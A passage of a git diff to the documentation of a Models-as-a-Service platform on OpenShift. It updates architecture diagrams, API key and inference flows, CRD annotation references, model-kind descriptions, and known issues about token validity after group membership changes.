Rate Limiting Service] + subgraph Storage["Storage"] + DB[(PostgreSQL)] end - subgraph "Policy Components" - AuthPolicy[**AuthPolicy**
gateway-auth-policy] - RateLimitPolicy[**RateLimitPolicy**
gateway-rate-limits] - TokenRateLimitPolicy[**TokenRateLimitPolicy**
gateway-level] + A -->|"1. Validate key"| Validate + Validate -->|"Lookup hash, check not expired"| DB + DB -->|"metadata"| Validate + + A -->|"2. Check subscription"| SubSelect + SubSelect -.->|"3. No access to requested sub → 403"| A + SubSelect -->|"4. Selected subscription"| A + + linkStyle 4 stroke:#c62828,stroke-width:2px,stroke-dasharray:5,5 + + style Validate fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff + style SubSelect fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff + style DB fill:#336791,stroke:#333,stroke-width:2px,color:#fff +``` + +### Observability Flow + +Token usage and rate-limit data flow from Limitador into Prometheus and onward to dashboards. + +**Flow summary:** + +1. Limitador stores token usage counters (e.g., `authorized_hits`, `authorized_calls`, `limited_calls`) with labels (`user`, `model`). +2. A ServiceMonitor (or Kuadrant PodMonitor) configures Prometheus to scrape Limitador's `/metrics` endpoint. +3. Prometheus stores the metrics in its time-series database. +4. Grafana (or other visualization tools) queries Prometheus to build dashboards for usage, billing, and operational health. + +```mermaid +graph LR + subgraph RateLimiting["Rate Limiting"] + Limitador[Limitador
Token usage counters
authorized_hits, authorized_calls, limited_calls] end - subgraph "Model Access Control" - RBAC[**Kubernetes RBAC**
Service Account Permissions] - LLMInferenceService[**LLMInferenceService**
Model Access Control] + subgraph Scraping["Metric Scraping"] + SM[ServiceMonitor
or PodMonitor] end - subgraph "Model Serving" - RHOAI[**RHOAI Platform**] - Models[**LLM Models**
Qwen, Granite, Llama] + subgraph Storage["Metrics Storage"] + Prometheus[(Prometheus)] end - subgraph "Observability" - Prometheus[**Prometheus**
Metrics Collection] + subgraph Visualization["Visualization"] + Grafana[Grafana
Dashboards] end - Client -->|Inference Request + Service Account Token| GatewayAPI - GatewayAPI --> Envoy - - Envoy --> Kuadrant - Kuadrant --> Authorino - Kuadrant --> Limitador - - Authorino --> AuthPolicy - Limitador --> RateLimitPolicy - Limitador --> TokenRateLimitPolicy - - Envoy -->|Check Model Access| RBAC - RBAC --> LLMInferenceService - LLMInferenceService -->|POST Permission Check| RHOAI - RHOAI --> Models - - Limitador -->|Usage Metrics| Prometheus - - style GatewayAPI fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff - style Kuadrant fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff - style Authorino fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff - style Limitador fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff - style AuthPolicy fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff - style RateLimitPolicy fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff - style TokenRateLimitPolicy fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff - style RBAC fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff - style LLMInferenceService fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff - style RHOAI fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff - style Models fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff + Limitador -->|"/metrics"| SM + SM -->|"Scrape"| Prometheus + Prometheus -->|"Query"| Grafana + + style Limitador fill:#e65100,stroke:#333,stroke-width:2px,color:#fff style Prometheus fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff + style Grafana fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff ``` -**Policy Engine Flow:** - -1. **User Request**: A user makes an inference request to the Gateway API with a valid token. -2. **Service Account Authentication**: Authorino validates service account tokens using gateway-auth-policy -3. **Rate Limiting**: Limitador enforces usage quotas per tier/user using gateway and per-route policies -4. 
**Model Access Control**: RBAC checks if service account has POST access to the specific LLMInferenceService -5. **Request Forwarding**: Only requests with proper model access are forwarded to RHOAI -6. **Metrics Collection**: Limitador sends usage data to Prometheus for observability dashboards - ## 🔄 Component Flows -### 1. Token Retrieval Flow (MaaS API) +### 1. API Key Creation Flow (MaaS API) -The MaaS API generates service account tokens based on user group membership and tier configuration: +Users create API keys by authenticating with their OpenShift token. The MaaS API generates a key, stores only the hash in PostgreSQL, and returns the plaintext once: ```mermaid sequenceDiagram @@ -235,61 +296,51 @@ sequenceDiagram participant Gateway as Gateway API participant Authorino participant MaaS as MaaS API - participant TierMapper as Tier Mapper - participant K8s as Kubernetes API + participant DB as PostgreSQL - User->>Gateway: POST /maas-api/v1/tokens
Authorization: Bearer {openshift-token} + User->>Gateway: POST /maas-api/v1/api-keys
Authorization: Bearer {openshift-token} Gateway->>Authorino: Enforce MaaS API AuthPolicy - Authorino->>K8s: TokenReview (validate OpenShift token) - K8s-->>Authorino: User identity (username, groups) + Authorino->>Authorino: TokenReview (validate OpenShift token) Authorino->>Gateway: Authenticated Gateway->>MaaS: Forward request with user context - Note over MaaS,TierMapper: Determine User Tier - MaaS->>TierMapper: GetTierForGroups(user.groups) - TierMapper->>K8s: Get ConfigMap(tier-to-group-mapping) - K8s-->>TierMapper: Tier configuration - TierMapper-->>MaaS: User tier (e.g., "premium") - - Note over MaaS,K8s: Ensure Tier Resources - MaaS->>K8s: Create Namespace({instance}-tier-{tier}) if needed - MaaS->>K8s: Create ServiceAccount({username-hash}) if needed - - Note over MaaS,K8s: Generate Token - MaaS->>K8s: CreateToken(namespace, SA name, TTL) - K8s-->>MaaS: TokenRequest with token and expiration + Note over MaaS,DB: Create API Key + MaaS->>MaaS: Generate sk-oai-* key, hash with SHA-256 + MaaS->>MaaS: Resolve subscription (explicit or highest priority) + MaaS->>DB: Store hash + metadata (user, groups, subscription, name) + DB-->>MaaS: Stored - MaaS-->>User: {
"token": "...",
"expiration": "4h",
"expiresAt": 1234567890
} + MaaS-->>User: { "key": "sk-oai-...", "id": "...", ... }
Plaintext shown ONLY ONCE ``` -### 3. Model Inference Flow +### 2. Model Inference Flow -The inference flow routes validated requests to RHOAI models: - -The Gateway API and RHCL components validate service account tokens and enforce policies: +Inference requests use the API key. Authorino validates it via HTTP callback (with caching); Limitador enforces subscription-based token limits: ```mermaid sequenceDiagram participant Client participant GatewayAPI - participant Kuadrant participant Authorino + participant MaaS as MaaS API participant Limitador - participant AuthPolicy - participant RateLimitPolicy participant LLMInferenceService - Client->>GatewayAPI: Inference Request + Service Account Token - GatewayAPI->>Kuadrant: Applying Policies - Kuadrant->>Authorino: Validate Service Account Token - Authorino->>AuthPolicy: Check Token Validity - AuthPolicy-->>Authorino: Token Valid + Tier Info - Authorino-->>Kuadrant: Authentication Success - Kuadrant->>Limitador: Check Rate Limits - Limitador->>RateLimitPolicy: Apply Tier-based Limits - RateLimitPolicy-->>Limitador: Rate Limit Status - Limitador-->>Kuadrant: Rate Check Result - Kuadrant-->>GatewayAPI: Policy Decision (Allow/Deny) - GatewayAPI ->> LLMInferenceService: Forward Request + Client->>GatewayAPI: Inference + API Key + GatewayAPI->>Authorino: Validate credentials + + alt API key (sk-oai-*) + Authorino->>MaaS: POST /internal/v1/api-keys/validate + MaaS->>MaaS: Lookup hash in PostgreSQL + MaaS-->>Authorino: { valid, userId, groups, subscription } + end + + Authorino->>MaaS: POST /internal/v1/subscriptions/select (subscription check) + MaaS-->>Authorino: Selected subscription + + Authorino->>GatewayAPI: Auth success (cached) + GatewayAPI->>Limitador: Check TokenRateLimitPolicy + Limitador-->>GatewayAPI: Within limits + GatewayAPI->>LLMInferenceService: Forward request LLMInferenceService-->>Client: Response ``` diff --git a/docs/content/configuration-and-management/crd-annotations.md 
b/docs/content/configuration-and-management/crd-annotations.md new file mode 100644 index 000000000..a3c23a05e --- /dev/null +++ b/docs/content/configuration-and-management/crd-annotations.md @@ -0,0 +1,84 @@ +# CRD Annotations Reference + +This page documents the standard annotations supported on MaaS custom resources. + +## Common annotations (all CRDs) + +These annotations are supported on **MaaSModelRef**, **MaaSAuthPolicy**, and **MaaSSubscription**. They follow OpenShift conventions and are recognized by the OpenShift console, `kubectl`, and other tooling. + +| Annotation | Description | Example | +| ---------- | ----------- | ------- | +| `openshift.io/display-name` | Human-readable display name | `"Llama 2 7B Chat"` | +| `openshift.io/description` | Free-text description of the resource | `"A general-purpose LLM for chat"` | + +## MaaSModelRef annotations + +In addition to the common annotations above, the MaaS API reads these annotations from **MaaSModelRef** and returns them in the `modelDetails` field of the `GET /v1/models` response. 
+ +| Annotation | Description | Returned in API | Example | +| ---------- | ----------- | --------------- | ------- | +| `openshift.io/display-name` | Human-readable model name | `modelDetails.displayName` | `"Llama 2 7B Chat"` | +| `openshift.io/description` | Model description | `modelDetails.description` | `"A large language model optimized for chat"` | +| `opendatahub.io/genai-use-case` | GenAI use case category | `modelDetails.genaiUseCase` | `"chat"` | +| `opendatahub.io/context-window` | Context window size | `modelDetails.contextWindow` | `"4096"` | + +### Example MaaSModelRef with annotations + +```yaml +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSModelRef +metadata: + name: llama-2-7b-chat + namespace: opendatahub + annotations: + openshift.io/display-name: "Llama 2 7B Chat" + openshift.io/description: "A large language model optimized for chat use cases" + opendatahub.io/genai-use-case: "chat" + opendatahub.io/context-window: "4096" +spec: + modelRef: + kind: LLMInferenceService + name: llama-2-7b-chat +``` + +### API response + +When annotations are set, the `GET /v1/models` response includes a `modelDetails` object: + +```json +{ + "id": "llama-2-7b-chat", + "object": "model", + "created": 1672531200, + "owned_by": "opendatahub", + "ready": true, + "url": "https://...", + "modelDetails": { + "displayName": "Llama 2 7B Chat", + "description": "A large language model optimized for chat use cases", + "genaiUseCase": "chat", + "contextWindow": "4096" + } +} +``` + +When no annotations are set (or all values are empty), `modelDetails` is omitted from the response. + +## MaaSAuthPolicy and MaaSSubscription annotations + +The common annotations (`openshift.io/display-name`, `openshift.io/description`) can be set on MaaSAuthPolicy and MaaSSubscription resources for use by `kubectl`, the OpenShift console, and other tooling. They are **not** returned in the `GET /v1/models` API response. 
+ +### Example + +```yaml +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSAuthPolicy +metadata: + name: premium-access + namespace: models-as-a-service + annotations: + openshift.io/display-name: "Premium Access Policy" + openshift.io/description: "Grants premium-users group access to premium models" +spec: + # ... +``` diff --git a/docs/content/configuration-and-management/group-membership-known-issues.md b/docs/content/configuration-and-management/group-membership-known-issues.md index 4df6091c0..2b90652b1 100644 --- a/docs/content/configuration-and-management/group-membership-known-issues.md +++ b/docs/content/configuration-and-management/group-membership-known-issues.md @@ -10,10 +10,10 @@ When a user is removed from a group (e.g., removed from `premium-users` group) w ### How Group Membership Affects Access -1. **Token Request**: When a user requests a MaaS token, their group memberships are evaluated to determine their tier. -2. **Service Account Creation**: A Service Account is created in the tier-specific namespace (e.g., `maas-default-gateway-tier-premium`). +1. **Token Request**: When a user requests a MaaS token, their group memberships are evaluated to determine their subscription(s). +2. **Service Account Creation**: A Service Account is created in the subscription-specific namespace (e.g., `maas-default-gateway-tier-premium` for the premium subscription). 3. **Token Issuance**: The token is issued for the Service Account, not the original user. -4. **Request Authorization**: Requests are authorized based on the Service Account's identity and the tier metadata cached in the AuthPolicy. +4. **Request Authorization**: Requests are authorized based on the Service Account's identity and the subscription metadata cached in the AuthPolicy. 
### Side Effects @@ -26,19 +26,19 @@ When a user is removed from a group (e.g., removed from `premium-users` group) w When a user is removed from a group, their existing MaaS tokens remain valid until expiration because: - The token is a Kubernetes Service Account token, not a user token. -- The Service Account continues to exist in the tier namespace. +- The Service Account continues to exist in the subscription namespace. - Kubernetes TokenReview validates the Service Account, not the original user's group membership. **Example Scenario**: ```text T+0h: User "alice" is in "premium-users" group -T+0h: Alice requests a token -> Gets SA token in maas-default-gateway-tier-premium namespace +T+0h: Alice requests a token -> Gets SA token in premium subscription namespace T+1h: Admin removes Alice from "premium-users" group T+1h: Alice's token is STILL VALID (expires at T+24h) T+1h: Alice can still make requests using the existing token T+24h: Token expires, Alice must request a new one -T+24h: New token request -> Alice gets "free" tier (or fails if no tier matches) +T+24h: New token request -> Alice gets "free" subscription (or fails if no subscription matches) ``` **Workaround**: @@ -53,25 +53,25 @@ curl -X DELETE "${HOST}/maas-api/v1/tokens" \ Note: The user must authenticate with their own token to revoke their tokens. Administrators cannot revoke tokens on behalf of other users in the current implementation. -#### 2. Rate Limiting Continues at Old Tier +#### 2. Rate Limiting Continues at Old Subscription **Impact**: Medium **Description**: -The AuthPolicy caches the tier lookup result (default TTL: 5 minutes). After a user is removed from a group: +The AuthPolicy caches the subscription lookup result (default TTL: 5 minutes). After a user is removed from a group: -- Requests within the cache window continue to use the old tier's rate limits. -- After cache expiry, the tier is re-evaluated based on current group membership. 
-- If the user still has a valid token but no longer belongs to any tier group, requests may fail. +- Requests within the cache window continue to use the old subscription's rate limits. +- After cache expiry, the subscription is re-evaluated based on current group membership. +- If the user still has a valid token but no longer belongs to any subscription group, requests may fail. **Example Timeline**: ```text T+0m: User removed from "premium-users" group -T+1m: Request made -> Cached tier "premium" used -> Rate limit: 1000 tokens/min +T+1m: Request made -> Cached subscription "premium" used -> Rate limit: 1000 tokens/min T+5m: Cache expires -T+6m: Request made -> Tier lookup fails (no matching group) -> Request may fail with 403 +T+6m: Request made -> Subscription lookup fails (no matching group) -> Request may fail with 403 ``` **Workaround**: @@ -85,10 +85,10 @@ T+6m: Request made -> Tier lookup fails (no matching group) -> Request may fai **Description**: -When a user is removed from a group, their Service Account in the tier namespace is not automatically deleted: +When a user is removed from a group, their Service Account in the subscription namespace is not automatically deleted: -- The Service Account remains in the tier namespace. -- No new tokens can be issued for the old tier (tier lookup fails). +- The Service Account remains in the subscription namespace. +- No new tokens can be issued for the old subscription (subscription lookup fails). - Old tokens continue to work until expiration. - This is a cleanup artifact, not a security issue (access is controlled by RBAC and rate limiting). 
@@ -99,14 +99,14 @@ When a user is removed from a group, their Service Account in the tier namespace - To find the Service Account for a specific user, list and filter by the username pattern: ```bash -# List all Service Accounts in the tier namespace -kubectl get serviceaccount -n maas-default-gateway-tier-<tier> +# List all Service Accounts in the subscription namespace +kubectl get serviceaccount -n maas-default-gateway-tier-<subscription> # Filter by username pattern (e.g., for user "alice@example.com") -kubectl get serviceaccount -n maas-default-gateway-tier-<tier> | grep alice +kubectl get serviceaccount -n maas-default-gateway-tier-<subscription> | grep alice # Delete the identified Service Account -kubectl delete serviceaccount -n maas-default-gateway-tier-<tier> +kubectl delete serviceaccount -n maas-default-gateway-tier-<subscription> ``` #### 4. User Downgrade Creates New Service Account @@ -115,27 +115,27 @@ kubectl delete serviceaccount -n maas-default-gateway-tier-<tier> **Description**: -When a user is moved to a lower tier (e.g., removed from `premium-users`, now only matching the `free` tier group, such as `system:authenticated` in the default configuration): +When a user is moved to a lower subscription (e.g., removed from `premium-users`, now only matching the `free` subscription group, such as `system:authenticated` in the default configuration): -- A new Service Account is created in the new tier namespace (e.g., `maas-default-gateway-tier-free`). -- The old Service Account in the premium tier namespace remains. +- A new Service Account is created in the new subscription namespace (e.g., `maas-default-gateway-tier-free`). +- The old Service Account in the premium subscription namespace remains. - Old premium tokens continue to work until expiration. -- New token requests create tokens in the free tier namespace. +- New token requests create tokens in the free subscription namespace. 
**Example**: ```text -Before: Alice in "premium-users" -> SA in maas-default-gateway-tier-premium -After: Alice removed from "premium-users" (still matches "free" tier group) +Before: Alice in "premium-users" -> SA in premium subscription namespace +After: Alice removed from "premium-users" (still matches "free" subscription group) -> Old SA still exists in premium namespace - -> New token request creates SA in maas-default-gateway-tier-free + -> New token request creates SA in free subscription namespace -> Alice now has SAs in both namespaces ``` **Workaround**: - Revoke tokens before changing group membership to ensure clean transition. -- Delete the user's Service Account manually from the old tier namespace when they change groups. +- Delete the user's Service Account manually from the old subscription namespace when they change groups. #### 5. Monitoring Shows Split Metrics @@ -143,16 +143,16 @@ After: Alice removed from "premium-users" (still matches "free" tier group) **Description**: -If a user has tokens from multiple tiers (before and after group change): +If a user has tokens from multiple subscriptions (before and after group change): - Metrics are attributed to the Service Account's namespace. -- Usage appears split across tier namespaces. +- Usage appears split across subscription namespaces. - This is a reporting artifact and does not affect access control. **Workaround**: - Aggregate metrics by username label if available. -- Encourage users to revoke old tokens after tier changes. +- Encourage users to revoke old tokens after subscription changes. ### Recommended Practices @@ -162,9 +162,9 @@ If a user has tokens from multiple tiers (before and after group change): 3. **Use Short Token Expiration**: Shorter token lifetimes reduce the window of continued access after group removal. -4. **Clean Up Service Accounts**: When a user changes groups, manually delete their Service Account from the old tier namespace to prevent orphaned resources. +4. 
**Clean Up Service Accounts**: When a user changes groups, manually delete their Service Account from the old subscription namespace to prevent orphaned resources. ### Related Documentation -- [Tier Configuration](./tier-configuration.md) - How to configure tier-to-group mappings +- [Quota and Access Configuration](./quota-and-access-configuration.md) - How to configure subscription-to-group mappings - [Token Management](./token-management.md) - Understanding token lifecycle and revocation diff --git a/docs/content/configuration-and-management/maas-controller-overview.md b/docs/content/configuration-and-management/maas-controller-overview.md index 7796e460e..eeacbd73e 100644 --- a/docs/content/configuration-and-management/maas-controller-overview.md +++ b/docs/content/configuration-and-management/maas-controller-overview.md @@ -57,7 +57,7 @@ flowchart TB **Summary:** You declare intent with MaaS CRs; the controller turns that into Gateway/Kuadrant resources that attach to the same HTTPRoute and backend (e.g. KServe LLMInferenceService). -The **MaaS API** GET /v1/models endpoint uses MaaSModelRef CRs as its primary source: it lists them in the API namespace, then **validates access** by probing each model’s `/v1/models` endpoint with the client’s **Authorization header** (passed through as-is). Only models that return 2xx or 405 are included. So the catalogue returned to the client is the set of MaaSModelRef objects the controller reconciles, filtered to those the client can actually access. No token exchange is performed; the header is forwarded as-is. (Once minting is in place, this may be revisited.) +The **MaaS API** GET /v1/models endpoint uses MaaSModelRef CRs as its primary source: it reads them cluster-wide (all namespaces), then **validates access** by probing each model’s `/v1/models` endpoint with the client’s **Authorization header** (passed through as-is). Only models that return 2xx or 405 are included. 
So the catalogue returned to the client is the set of MaaSModelRef objects the controller reconciles, filtered to those the client can actually access. No token exchange is performed; the header is forwarded as-is. --- @@ -213,21 +213,18 @@ flowchart LR Deploy --> Examples ``` - **Namespace**: Controller and default MaaS CRs live in **opendatahub** (configurable). +- **Namespaces**: MaaS API and controller default to **opendatahub** (configurable). MaaSAuthPolicy and MaaSSubscription default to **models-as-a-service** (configurable). MaaSModelRef must live in the **same namespace** as the model it references (e.g. **llm**). - **Install**: `./scripts/deploy.sh` installs the full stack including the controller. Optionally run `./scripts/install-examples.sh` for sample MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription. --- ## 9. Authentication (Current Behavior) -For **GET /v1/models**, the API forwards the client’s **Authorization** header as-is to each model endpoint (no token exchange). For inference, until MaaS API token minting is in place, use the **OpenShift token**: +For **GET /v1/models**, the maas-api forwards the client’s **Authorization** header as-is to each model endpoint (no token exchange). You can use an **OpenShift token** or an **API key** (`sk-oai-*`). With a user token, you may send `X-MaaS-Subscription` to filter when you have access to multiple subscriptions. -```bash -export TOKEN=$(oc whoami -t) -curl -H "Authorization: Bearer $TOKEN" "https://<host>/llm/<model>/v1/chat/completions" -d '...' -``` +For **model inference** (requests to `…/llm/<model>/v1/chat/completions` and similar), use an **API key** created via `POST /v1/api-keys` only. Each key is bound to one MaaSSubscription at mint time. -The Kuadrant AuthPolicy validates this token via **Kubernetes TokenReview** and derives user/groups for authorization and for the identity passed to TokenRateLimitPolicy (including `groups_str`). 
+The Kuadrant AuthPolicy validates API keys via the MaaS API and validates user tokens via `Kubernetes TokenReview`, deriving user/groups for authorization and for TokenRateLimitPolicy (including `groups_str`). --- @@ -236,7 +233,7 @@ The Kuadrant AuthPolicy validates this token via **Kubernetes TokenReview** and | Topic | Summary | |-------|---------| | **What** | MaaS Controller = control plane that reconciles MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription into Gateway API and Kuadrant resources. | -| **Where** | Single controller in `maas-controller`; CRs and generated resources can live in opendatahub or other namespaces. | +| **Where** | Single controller in `opendatahub`; MaaSAuthPolicy / MaaSSubscription default to `models-as-a-service`; MaaSModelRef and generated Kuadrant policies target their model’s namespace. | | **How** | Three reconcilers watch MaaS CRs (and related resources); each creates/updates HTTPRoutes, AuthPolicies, or TokenRateLimitPolicies. | | **Identity bridge** | AuthPolicy exposes all user groups as a comma-separated `groups_str`; TokenRateLimitPolicy uses `groups_str.split(",").exists(...)` for subscription matching (the “string trick”). | | **Deploy** | Run `./scripts/deploy.sh`; optionally install examples. | diff --git a/docs/content/configuration-and-management/maas-model-kinds.md b/docs/content/configuration-and-management/maas-model-kinds.md index 96d1f43f2..4c576619a 100644 --- a/docs/content/configuration-and-management/maas-model-kinds.md +++ b/docs/content/configuration-and-management/maas-model-kinds.md @@ -1,4 +1,4 @@ -# MaaSModelRef kinds (future) +# MaaSModelRef Kinds The MaaS API lists models from **MaaSModelRef** CRs only. 
Each MaaSModelRef defines a **backend reference** (`spec.modelRef`) that identifies the type and location of the model endpoint—similar in spirit to how [Gateway API's BackendRef](https://gateway-api.sigs.k8s.io/reference/spec/#backendref) defines how a Route forwards requests to a Kubernetes resource (group, kind, name, namespace). @@ -12,13 +12,12 @@ MaaSModelRef's `spec.modelRef` identifies the **referent** (the backend that ser | ----------- | ----------- | | **kind** | The type of backend. Determines which controller reconciles this MaaSModelRef and how the endpoint is resolved. Valid values: `LLMInferenceService`, `ExternalModel`. The alias `llmisvc` is also accepted for backwards compatibility. | | **name** | Name of the referent resource (e.g. LLMInferenceService name, or external model identifier). | -| **namespace** | *(Optional)* Namespace of the referent. If empty, the MaaSModelRef's namespace is used. | -The controller that reconciles MaaSModelRef uses **kind** to decide how to resolve the backend and populate `status.endpoint` and `status.phase`. Cross-namespace references are supported by specifying `modelRef.namespace`. +The controller that reconciles MaaSModelRef uses **kind** to decide how to resolve the backend and populate `status.endpoint` and `status.phase`. The referent must be in the same namespace as the MaaSModelRef. ## Endpoint override -MaaSModel supports an optional `spec.endpointOverride` field. When set, the controller uses this value for `status.endpoint` instead of the auto-discovered endpoint from the backend (LLMInferenceService status, Gateway, or HTTPRoute hostnames). +MaaSModelRef supports an optional `spec.endpointOverride` field. When set, the controller uses this value for `status.endpoint` instead of the auto-discovered endpoint from the backend (LLMInferenceService status, Gateway, or HTTPRoute hostnames). This is useful when: - The controller picks the wrong gateway or hostname for the model endpoint. 
@@ -29,25 +28,44 @@ Example: ```yaml apiVersion: maas.opendatahub.io/v1alpha1 -kind: MaaSModel +kind: MaaSModelRef metadata: name: my-model - namespace: opendatahub + namespace: llm spec: modelRef: kind: LLMInferenceService name: my-model - namespace: llm endpointOverride: "https://correct-hostname.example.com/my-model" ``` The controller still validates the backend (HTTPRoute exists, LLMInferenceService is ready, etc.) — the override only affects the final endpoint URL written to `status.endpoint`. When the field is empty or omitted, the controller uses its normal discovery logic. -## Current behavior +## Supported Kinds -- **Supported kind today:** `LLMInferenceService` (also accepts the alias `llmisvc` for backwards compatibility). The MaaS controller reconciles MaaSModelRefs whose **modelRef** points to an LLMInferenceService (by name and optional namespace). It sets `status.endpoint` from the LLMInferenceService status and `status.phase` from its readiness. -- **API behavior:** The API reads MaaSModelRefs from the informer cache, maps each to an API model (`id`, `url`, `ready`, `kind`, etc.), then **validates access** by probing each model's `/v1/models` endpoint with the request's **Authorization header** (passed through as-is). Only models that return 2xx or 405 are included. -- **Kind on the wire:** Each model in the GET /v1/models response can carry a `kind` field (e.g. `LLMInferenceService`) from `spec.modelRef.kind` for clients or tooling. +### LLMInferenceService + +The `LLMInferenceService` kind (also accepts the alias `llmisvc` for backwards compatibility) references models deployed on the cluster via the LLMInferenceService CRD. The controller: +- Sets `status.endpoint` from the LLMInferenceService status +- Sets `status.phase` from LLMInferenceService readiness + +### ExternalModel + +The `ExternalModel` kind references external AI/ML providers (e.g., OpenAI, Anthropic, Azure OpenAI). When using this kind: +1. 
Create an [ExternalModel](../reference/crds/external-model.md) CR with provider, endpoint, and credential reference +2. Create a MaaSModelRef that references the ExternalModel by name + +The controller: +- Fetches the ExternalModel CR from the same namespace +- Validates the user-supplied HTTPRoute references the correct gateway +- Derives `status.endpoint` from HTTPRoute hostnames or gateway addresses +- Sets `status.phase` based on HTTPRoute acceptance by the gateway + +## API Behavior + +- The API reads MaaSModelRefs cluster-wide, maps each to an API model (`id`, `url`, `ready`, `kind`, etc.) +- **Access validation**: Probes each model's `/v1/models` endpoint with the request's Authorization header. Only models that return 2xx or 405 are included. +- **Kind on the wire**: Each model in the GET /v1/models response carries a `kind` field from `spec.modelRef.kind` ## Adding a new kind in the future @@ -66,7 +84,7 @@ To support a new backend type (a new **kind** in `spec.modelRef`): - **Option B:** Extend the API's access-validation logic to branch on **kind** and use a kind-specific probe (different URL path or client), while keeping the same contract: include a model only if the probe with the user's token succeeds. 3. **Enrichment (optional)** - - Extra metadata (e.g. display name) can be set by the controller in status or annotations and mapped into the model response. For a new kind, add a small branch in the MaaSModelRef → API model conversion if needed. + - The API reads standard annotations from MaaSModelRef (`openshift.io/display-name`, `openshift.io/description`, `opendatahub.io/genai-use-case`, `opendatahub.io/context-window`) and returns them in the `modelDetails` field of the GET /v1/models response. See [CRD annotations](crd-annotations.md) for the full list. For a new kind, add a small branch in the MaaSModelRef → API model conversion if needed. 4. 
**RBAC** - If the new kind’s reconciler or the API needs to read another resource, add the corresponding **list/watch** (and optionally **get**) permissions to the maas-api ClusterRole and/or the controller’s RBAC. @@ -74,6 +92,6 @@ To support a new backend type (a new **kind** in `spec.modelRef`): ## Summary - **modelRef** is the backend reference (kind, name, optional namespace), analogous to [Gateway API BackendRef](https://gateway-api.sigs.k8s.io/reference/spec/#backendref). -- **Listing:** Always from MaaSModelRef cache; no kind-specific listing logic. +- **Listing:** Always from MaaSModelRef resources cluster-wide; no kind-specific listing logic. - **Access validation:** Same probe (GET endpoint with the request's Authorization header as-is) for all kinds unless kind-specific probes are added later. - **New kinds:** Implement in the controller (resolve referent, set status.endpoint and status.phase); extend the API only if the new kind cannot use the same probe path or needs different enrichment. diff --git a/docs/content/configuration-and-management/maas-models.md b/docs/content/configuration-and-management/maas-models.md new file mode 100644 index 000000000..1deed3a6c --- /dev/null +++ b/docs/content/configuration-and-management/maas-models.md @@ -0,0 +1,50 @@ +# MaaS Models + +MaaS uses **MaaSModelRef** to identify model servers that live on the cluster. Each MaaSModelRef is a reference to a model server—it holds the information MaaS needs to perform authentication, authorization, and rate limiting. + +By using a single unified object (MaaSModelRef) for all model types, MaaS can handle different kinds of model servers—each with its own backend and lifecycle—through one consistent interface. The controller uses a **provider paradigm** to distinguish between types: each model type (for example, LLMInferenceService, external APIs) has a provider that knows how to reconcile and resolve that type. 
Today, vLLM (via LLMInferenceService) is the supported provider; additional providers may be added in the future. + +## The Model Reference + +A MaaS model is a reference to a model server (for example, an LLMInferenceService or external API). The MaaS controller, running in the **control plane**, reconciles these references and gathers the information needed to route requests and enforce policies—such as the model's endpoint URL and readiness status. + +That information is then used by MaaSSubscription and MaaSAuthPolicy to complete their logic: validating access, selecting subscriptions, and enforcing rate limits. + +## How Model Information Is Used + +Both **MaaSAuthPolicy** (access) and **MaaSSubscription** (quota) reference models by their **MaaSModelRef** name. They rely on the information that MaaSModelRef provides—gathered at the control plane—to: + +- Route requests to the correct model endpoint +- Validate that the user has access to the requested model +- Apply the correct rate limits for that model + +```mermaid +flowchart LR + subgraph Downstream ["Downstream (cluster)"] + ModelServer["Model Server
(e.g. LLMInferenceService)"] + end + + MaaSModelRef["MaaSModelRef"] + + subgraph Policies ["Policies"] + MaaSAuthPolicy["MaaSAuthPolicy"] + MaaSSubscription["MaaSSubscription"] + end + + ModelServer -->|"1. Fetches endpoint,
status, etc."| MaaSModelRef + MaaSModelRef -->|"2. Feeds model info"| MaaSAuthPolicy + MaaSModelRef -->|"2. Feeds model info"| MaaSSubscription + + style MaaSModelRef fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff + style MaaSAuthPolicy fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style MaaSSubscription fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style ModelServer fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff +``` + +## Summary + +- **MaaSModelRef** — Stores the reference to a model server; the controller gathers the information needed for auth and routing. +- **MaaSAuthPolicy** and **MaaSSubscription** — Reference models by name and use that information to enforce access and quota. +- **Control plane** — The MaaS controller reconciles model references and populates the data that policies and subscriptions depend on. + +For configuration details and how to create and use MaaSModelRef, see [Quota and Access Configuration](quota-and-access-configuration.md) in the Administration Guide. diff --git a/docs/content/configuration-and-management/model-access-behavior.md b/docs/content/configuration-and-management/model-access-behavior.md index 57e6b0194..1bcda9b87 100644 --- a/docs/content/configuration-and-management/model-access-behavior.md +++ b/docs/content/configuration-and-management/model-access-behavior.md @@ -1,166 +1,49 @@ -# Model Tier Access Behavior +# Model Access Behavior -This document describes the expected behaviors and operational considerations when modifying model tier access in the MaaS Platform Technical Preview release. +This document describes the expected behaviors and operational considerations when modifying model access (subscription) in the MaaS Platform. 
